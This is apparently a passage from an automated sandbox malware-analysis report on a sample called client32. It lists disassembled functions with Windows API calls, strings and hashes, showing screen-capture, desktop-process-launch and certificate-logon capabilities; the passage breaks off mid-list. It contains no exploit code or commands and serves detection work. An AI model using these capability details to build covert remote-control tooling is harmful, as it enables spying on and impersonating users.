                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: QueryValue
                                                        • String ID:
                                                        • API String ID: 3660427363-0
                                                        • Opcode ID: 5016ec284c3da2d402a74a179208904017d38d52b2a07d1272dd52b37792262b
                                                        • Instruction ID: 57cc01f50fbb590e2524d85a16b2fbab3df4c7fb8930128a4a94bf816e4774f3
                                                        • Opcode Fuzzy Hash: 5016ec284c3da2d402a74a179208904017d38d52b2a07d1272dd52b37792262b
                                                        • Instruction Fuzzy Hash: C711E9717142456FEB21DE04D590AEFFBB9EBC533AF20816AE5194790CC231D482C760
                                                        Function 110EF160 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110EF18D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: fb78fbe809c35f0ef85edaf52d24d1374a363710fbb08966f967051581e1cc5d
                                                        • Instruction ID: e567e6d9deb43754708739d5b8ecc67293fcf28fe655b386a3f4b7f61280699d
                                                        • Opcode Fuzzy Hash: fb78fbe809c35f0ef85edaf52d24d1374a363710fbb08966f967051581e1cc5d
                                                        • Instruction Fuzzy Hash: 22118675A0155D9FDB11CBA9DC94AEEB7EC9F49304F4040DDE9099B240EA70AF488B91
                                                        Function 1115EAE4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000008,1102F53F,00000000,?,111587B4,?,1102F53F,00000000,00000000,00000000,?,1115A147,00000001,00000214,?,111028FE), ref: 1115EB27
                                                          • Part of subcall function 11157CCF: __getptd_noexit.LIBCMT ref: 11157CCF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 328603210-0
                                                        • Opcode ID: b273a25811fde905e5cee87c6aa7cb02e25be8654d74a1ff2e42c0156245fb87
                                                        • Instruction ID: 332878df44de031bd3fde79402edd0d066dbf36eb0a5f5ad350df6a08150c577
                                                        • Opcode Fuzzy Hash: b273a25811fde905e5cee87c6aa7cb02e25be8654d74a1ff2e42c0156245fb87
                                                        • Instruction Fuzzy Hash: 59017532B022769AEBD58E25C994B5AF759AB83766F01C629E836C75D0D770D800C760
                                                        Function 11155CC3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __waccess_s
                                                        • String ID:
                                                        • API String ID: 4272103461-0
                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                        • Instruction ID: 840aff0e7d330be87414fd3cd5a9ac48178d49a546ea7aaee28d5de4cbf962c1
                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                        • Instruction Fuzzy Hash: F2C02B3300400D7F4F480DE1EC00C043F1DC6803347204211F81CCC090DD32E4108140
                                                        Function 111524D7 Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __fsopen
                                                        • String ID:
                                                        • API String ID: 3646066109-0
                                                        • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                        • Instruction ID: cdd7364d54deba196aaed2948fa43e78b4163aec9a4e7603f5b1489158abed43
                                                        • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                        • Instruction Fuzzy Hash: F2C0927754020CB7CF911A82EC02E9A7F2A9BC1668F148020FB2C19160AA73EA619689
                                                        Function 009D1000 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _NSMClient32@8.PCICL32(?,?,?,009D10AB,00000000), ref: 009D1009
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3741969770.00000000009D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3741789673.00000000009D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Client32@8
                                                        • String ID:
                                                        • API String ID: 433899448-0
                                                        • Opcode ID: dcaa56d6c6c8e88b1e4f95152afe5240dafa7d8740490bf80e3636b52cdfcebe
                                                        • Instruction ID: 8d0473fa9356ad18d4e59706d2568dafb867c3e2077871d3c6b05fe7508367fe
                                                        • Opcode Fuzzy Hash: dcaa56d6c6c8e88b1e4f95152afe5240dafa7d8740490bf80e3636b52cdfcebe
                                                        • Instruction Fuzzy Hash: 68B0123308024D77CF017E81EE01D4B3B1DAB40310F004412FE100126286A398B0B663

                                                        Non-executed Functions

                                                        Function 11117290 Relevance: 118.0, APIs: 60, Strings: 7, Instructions: 767windowsleepsynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _calloc.LIBCMT ref: 111172AF
                                                        • GetDC.USER32(00000000), ref: 111172E8
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 111172F7
                                                        • CreateCompatibleBitmap.GDI32(00000000,FFFFFFFF,00000001), ref: 1111730C
                                                        • SelectObject.GDI32(00000000,00000000), ref: 1111731A
                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 1111732F
                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 1111733C
                                                        • _malloc.LIBCMT ref: 11117363
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • _calloc.LIBCMT ref: 11117374
                                                        • Sleep.KERNEL32(11117E9D), ref: 111173B8
                                                        • GetTickCount.KERNEL32 ref: 111173BE
                                                        • GetSystemMetrics.USER32(0000004C), ref: 11117418
                                                        • GetSystemMetrics.USER32(0000004D), ref: 11117422
                                                        • GetTickCount.KERNEL32 ref: 1111749C
                                                        • WaitForSingleObject.KERNEL32(?,000000FA), ref: 111174D1
                                                        • _memset.LIBCMT ref: 111174F5
                                                        • _memset.LIBCMT ref: 11117507
                                                        • _malloc.LIBCMT ref: 1111762B
                                                        • _malloc.LIBCMT ref: 11117658
                                                        • _memset.LIBCMT ref: 11117671
                                                        • _calloc.LIBCMT ref: 111176D1
                                                        • _calloc.LIBCMT ref: 111176EF
                                                        • GetSystemPaletteEntries.GDI32(?,00000000,00000100,?), ref: 1111771A
                                                        • GetStockObject.GDI32(0000000F), ref: 11117752
                                                        • SelectPalette.GDI32(?,00000000), ref: 11117760
                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 11117770
                                                        • SelectPalette.GDI32(?,?,00000000), ref: 11117786
                                                        • RealizePalette.GDI32(?), ref: 11117793
                                                        • _memset.LIBCMT ref: 111177E5
                                                        • SelectPalette.GDI32(?,?,00000000), ref: 11117807
                                                        • DeleteObject.GDI32(?), ref: 1111780E
                                                        • CreatePalette.GDI32(?), ref: 1111782B
                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 11117841
                                                        • RealizePalette.GDI32(?), ref: 1111784E
                                                        • BitBlt.GDI32(?,00000000,00000000,FFFFFFFF,00000001,?,?,?,00CC0020), ref: 1111788D
                                                        • GetObjectA.GDI32(?,00000018,?), ref: 111178A3
                                                        • GetBitmapBits.GDI32(?,?,?), ref: 111178BE
                                                        • GetDIBits.GDI32(?,?,00000000,00000001,?,?,00000000), ref: 11117913
                                                        • _malloc.LIBCMT ref: 11117B49
                                                        • GetTickCount.KERNEL32 ref: 11117DF6
                                                        • CloseHandle.KERNEL32(?), ref: 11117E03
                                                        • _free.LIBCMT ref: 11117E15
                                                        • _free.LIBCMT ref: 11117E21
                                                        • _free.LIBCMT ref: 11117E2D
                                                        • _free.LIBCMT ref: 11117E39
                                                        • SelectObject.GDI32(?,?), ref: 11117E4F
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Palette$Select$Object$_calloc_free_malloc_memset$CountCreateSystemTick$BitmapBitsCapsCompatibleDeviceMetricsRealize$AllocateCloseDeleteEntriesErrorExitHandleHeapLastMessageProcessSingleSleepStockWaitwsprintf
                                                        • String ID: ($@L(t$Client$SCRAPE.CPP$ScreenScrapeCPU$_$hStopScrape
                                                        • API String ID: 3932011530-1240846060
                                                        • Opcode ID: 41f4eb196c39dc6a78c837dce78470dc62e23143fc7ef4ff3f55dc3ed3300e45
                                                        • Instruction ID: bf10a9902b4c1d1c1bebc66a4f47a1518a6e4e764ac0c29533848247b5017043
                                                        • Opcode Fuzzy Hash: 41f4eb196c39dc6a78c837dce78470dc62e23143fc7ef4ff3f55dc3ed3300e45
                                                        • Instruction Fuzzy Hash: 427239B59002698FDB61DF24CC84B99FBF5BB49304F14C1E9E589AB244DB71AE81CF90
                                                        Function 11085430 Relevance: 66.8, APIs: 31, Strings: 7, Instructions: 296librarywindowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 110854D4
                                                        • GetVersionExA.KERNEL32(?,00000000,?,00000000), ref: 110854ED
                                                        • OpenWindowStationA.USER32(winsta0,00000000,00060000), ref: 1108551F
                                                        • GetProcessWindowStation.USER32 ref: 1108552D
                                                        • SetProcessWindowStation.USER32(00000000), ref: 1108553C
                                                        • OpenDesktopA.USER32(default,00000000,00000000,00060081), ref: 11085552
                                                        • SetProcessWindowStation.USER32(00000000), ref: 11085565
                                                        • CloseWindowStation.USER32(00000000), ref: 1108556C
                                                        • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 11085590
                                                        • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 110855A5
                                                          • Part of subcall function 110851E0: GetUserObjectSecurity.USER32(?,?,00000000,00000000,?), ref: 11085218
                                                          • Part of subcall function 110851E0: GetProcessHeap.KERNEL32(00000008,?), ref: 1108522A
                                                          • Part of subcall function 110851E0: HeapAlloc.KERNEL32(00000000), ref: 11085231
                                                          • Part of subcall function 110851E0: GetUserObjectSecurity.USER32(?,00000004,110855CC,?,?), ref: 11085247
                                                          • Part of subcall function 110851E0: GetUserObjectSecurity.USER32(00000001,00000004,00000000,00000001,00000001), ref: 11085265
                                                          • Part of subcall function 110851E0: GetProcessHeap.KERNEL32(00000008,00000001), ref: 11085271
                                                          • Part of subcall function 110851E0: HeapAlloc.KERNEL32(00000000), ref: 11085278
                                                          • Part of subcall function 110851E0: GetUserObjectSecurity.USER32(00000001,00000004,?,00000001,00000001), ref: 1108528E
                                                          • Part of subcall function 110851E0: GetSecurityDescriptorDacl.ADVAPI32(110855CC,00000000,?,?), ref: 110852B0
                                                          • Part of subcall function 110851E0: GetSecurityDescriptorDacl.ADVAPI32(?,00000000,?,?), ref: 110852C9
                                                        • _memset.LIBCMT ref: 110855E7
                                                        • LoadLibraryA.KERNEL32(userenv), ref: 11085606
                                                        • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 11085618
                                                        • IsBadReadPtr.KERNEL32(?,00000001), ref: 1108563B
                                                        • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 1108568E
                                                        • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 110856AB
                                                        • FreeLibrary.KERNEL32(00000000), ref: 110856C3
                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 110856EF
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11085710
                                                        • DispatchMessageA.USER32(?), ref: 1108571D
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 1108572E
                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 11085746
                                                        • CloseHandle.KERNEL32(00000000), ref: 11085765
                                                        • CloseHandle.KERNEL32 ref: 1108576A
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 11085779
                                                        • HeapFree.KERNEL32(00000000), ref: 11085780
                                                        • CloseDesktop.USER32(?), ref: 11085797
                                                        • GetLastError.KERNEL32 ref: 110857A1
                                                        • SetProcessWindowStation.USER32(?), ref: 110857BC
                                                        • CloseWindowStation.USER32(?), ref: 110857CD
                                                        • GetLastError.KERNEL32 ref: 110857D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$StationWindow$HeapSecurity$CloseUser$HandleObject$Message$AddressAllocDaclDescriptorDesktopErrorFreeInformationLastLibraryMultipleObjectsOpenPeekProcWait_memset$CreateDispatchLoadReadVersion
                                                        • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$Error closing desktop, e=%d$Error closing winsta, e=%d$default$userenv$winsta0
                                                        • API String ID: 2664440712-1106524449
                                                        • Opcode ID: 677b5d0fbb0e76526f67e711a5c73b3ce293ee8ad6a0a9596ae823fe0477a226
                                                        • Instruction ID: f061770eabc51647ab4d4230c3b4071e061b0d94ed79287bc5cfb6b3fcb425fe
                                                        • Opcode Fuzzy Hash: 677b5d0fbb0e76526f67e711a5c73b3ce293ee8ad6a0a9596ae823fe0477a226
                                                        • Instruction Fuzzy Hash: A1B18075E00329AFEB21DF658C84F9EBBB8BF45714F4081D9E919A3284DB719980CF61
                                                        Function 110A57F0 Relevance: 65.2, APIs: 22, Strings: 15, Instructions: 402libraryloaderencryptionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 110A4AA0: LoadLibraryA.KERNEL32(Crypt32.dll,00000000,?,110A5885,82E0FB89,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?), ref: 110A4AE0
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertCreateCertificateContext), ref: 110A4AFC
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertFreeCertificateContext), ref: 110A4B09
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertGetNameStringA), ref: 110A4B16
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertGetValidUsages), ref: 110A4B23
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertOpenStore), ref: 110A4B30
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertOpenSystemStoreA), ref: 110A4B3D
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertCloseStore), ref: 110A4B4A
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertAddCertificateContextToStore), ref: 110A4B57
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertAddEncodedCertificateToStore), ref: 110A4B64
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertSetCertificateContextProperty), ref: 110A4B71
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertGetCertificateContextProperty), ref: 110A4B7E
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CryptAcquireCertificatePrivateKey), ref: 110A4B8B
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(?,CertEnumCertificatesInStore), ref: 110A4B98
                                                          • Part of subcall function 110A4AA0: GetProcAddress.KERNEL32(00000000,CertGetEnhancedKeyUsage), ref: 110A4BA5
                                                        • GetModuleHandleA.KERNEL32(Advapi32.dll,82E0FB89,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A591E
                                                        • GetProcAddress.KERNEL32(00000000,CredMarshalCredentialA), ref: 110A5930
                                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 110A5948
                                                        • GetLastError.KERNEL32(?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A599C
                                                        • CryptReleaseContext.ADVAPI32(?,00000000,82E0FB89,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?), ref: 110A5D41
                                                        • SetLastError.KERNEL32(00000057,82E0FB89,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A5D8B
                                                        • FreeLibrary.KERNEL32(?,82E0FB89,?,?,?,?,11172CDB,000000FF,?,110E94A1,00000000,00000000,?,?,?,FFFFFFFF), ref: 110A5D9C
                                                        Strings
                                                        • CertGetCertificateContextProperty (3) FAILED (%d), xrefs: 110A5C35
                                                        • CertGetCertificateContextProperty (2) FAILED (%d), xrefs: 110A5BFA
                                                        • CertGetCertificateContextProperty (1) failed (%d), xrefs: 110A5BB3
                                                        • CredFree, xrefs: 110A593C
                                                        • CredMarshalCredentialA, xrefs: 110A5924
                                                        • Advapi32.dll, xrefs: 110A5919
                                                        • LogonUserWithCert FAILED (%d) , xrefs: 110A5D79
                                                        • LogonUserWithCert - Advapi32.dll does NOT provide required functionality!, xrefs: 110A5CE9
                                                        • LogonUserWithCert - Crypt32.dll NOT found!!!, xrefs: 110A58B0
                                                        • CertAddCertificateContextToStore FAILED (%d), xrefs: 110A5B7B
                                                        • AttemptLogon FAILED [status: 0x%08x], xrefs: 110A5CBC
                                                        • \\.\%s\, xrefs: 110A59B6
                                                        • LogonUserWithCert - Crypt32.dll does NOT provide required functionality!, xrefs: 110A5CFD
                                                        • LogonUserWithCert - CredMarshalCredential FAILED (%d), xrefs: 110A5CDF
                                                        • CryptGetProvParam FAILED (%d), xrefs: 110A5AE3, 110A5B3A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
